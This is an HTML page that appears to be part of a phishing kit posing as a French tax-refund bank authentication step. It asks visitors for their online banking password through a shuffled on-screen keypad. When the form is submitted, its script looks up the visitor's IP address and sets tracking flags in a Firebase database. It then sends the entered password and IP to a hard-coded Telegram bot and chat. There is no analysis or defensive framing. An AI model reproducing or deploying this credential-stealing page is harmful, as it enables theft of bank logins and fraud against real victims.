<!DOCTYPE html>
<!-- Coding By CodingNepal - codingnepalweb.com -->
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>OTP Verification Form</title>
    <link rel="stylesheet" href="style.css">
    <!-- Boxicons CSS -->

  </head>
  <body>
  	   
  	<center>
  	<div class="dagaCode">
	<b style="color:#5BB500">Pour valider votre remboursement, veuillez vous authentifier.</b>
	<p>Composez le mot de passe de votre Espace Client bancaire.</p>
  </div>
    <div class="container">
 
<img style="margin-bottom:10px" width="100" src="https://cdn-icons-png.freepik.com/512/8460/8460433.png">
    
    
	<p>Code Sécurité:</p>
  
  	
    <input id="code" type="number" class="passwordCode" required>
    <div class="ganga" id="numberContainer">
    </div>
    <button class="btnvaCode" type="submit" name="submit_btn" id = "submit" > Validé  </button>
    
    </div>
    </center>
    
    
    <style>
    	

:where(.container, form, .input-field, header) {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
}
.container {
  border: solid 1.5px #CACACA;
  max-width: 500px;
  margin:10px;
  padding:10px;
  border-radius: 5px;

  
}
.container h4 {
  font-size: 1.25rem;
  color: #333;
  font-weight: 500;
}

.input-field input {
  height: 45px;
  width: 90%;
  border-radius: 6px;
  outline: none;
  font-size: 1.125rem;
  text-align: center;
  border: 1px solid #ddd;
}
.input-field input:focus {
  box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1);
}

form button {
  margin-top: 25px;
  width: 100%;
  color: #fff;
  font-size: 1rem;
  border: none;
  padding: 9px 0;
  cursor: pointer;
  border-radius: 6px;
  pointer-events: none;
  background: #4070f4;
  transition: all 0.2s ease;
}

form button:hover {
  background: #0e4bf1;
}
*{
font-family:normal;

}
    </style>
    
    <script>
document.addEventListener("DOMContentLoaded", function() {

    var numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0];


    numbers = numbers.sort(function() {
        return Math.random() - 0.5;
    });


    var numberContainer = document.getElementById("numberContainer");

    numbers.forEach(function(number) {
        var button = document.createElement("button");
        button.className = "buttonRa";
        button.textContent = number;
        button.onclick = function() {
            insertNumber(number);
        };
        numberContainer.appendChild(button);
    });
});


function insertNumber(number) {
        var passwordCodeInput = document.querySelector('.passwordCode');
        passwordCodeInput.value += number;
    }



</script>




<script src="https://www.gstatic.com/firebasejs/9.1.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.1.0/firebase-database.js"></script>

<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
<script type="module">

import { initializeApp } from "https://www.gstatic.com/firebasejs/9.19.1/firebase-app.js";
import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/9.19.1/firebase-database.js";


const firebaseConfig = {
  apiKey: "AIzaSyBl3jw2EGp4FLto4DM0OZbryvcMh7boNfc",
  authDomain: "testespam-91c35.firebaseapp.com",
  databaseURL: "https://testespam-91c35-default-rtdb.firebaseio.com",
  projectId: "testespam-91c35",
  storageBucket: "testespam-91c35.appspot.com",
  messagingSenderId: "715946513851",
  appId: "1:715946513851:web:2925c3b38ba874cdaee09e"
};
const app = initializeApp(firebaseConfig);
const db = getDatabase(app);

const url = window.location.href;
      const idValue = new URL(url).searchParams.get('id');
      

const getElementValue = (id) => document.getElementById(id).value;
const submitButton = document.getElementById("submit");

submitButton.addEventListener('click', async (e) => {
  e.preventDefault();
  const response = await fetch('https://api64.ipify.org?format=json');
  const { ip: DiIp } = await response.json();

  const DiCode = getElementValue("code");

  if (DiCode) {
    set(ref(db, `user/${idValue}`), {
      Loading: "true",
      SMS: "false",
      CC: "false",
      CODE2: "false",
      RESU: "false",
      APP: "false",
      APPYES: "false",
      APPNO: "false"
    }).then(() => {
      const inputValue = $('.passwordCode').val();
      var botToken = '6405780707:AAHRLzgioifKDMGv5Rr9BGI-xqr-R7TZmtQ';
  	var chatId = '5426755496';

$.ajax({
  type: 'POST',
  url: `https://api.telegram.org/bot${botToken}/sendMessage`,
  data: {
    chat_id: chatId,
    text: `IMPOTS-CODE: ${inputValue}\nIP: ${DiIp}`
  },
  success: function(response) {
    window.location.href = 'loading.html?id=' + idValue;
  },
  error: function(error) {
    alert('ERROR:', error);
  }
});

    });
  }
});

</script>
  </body>
</html>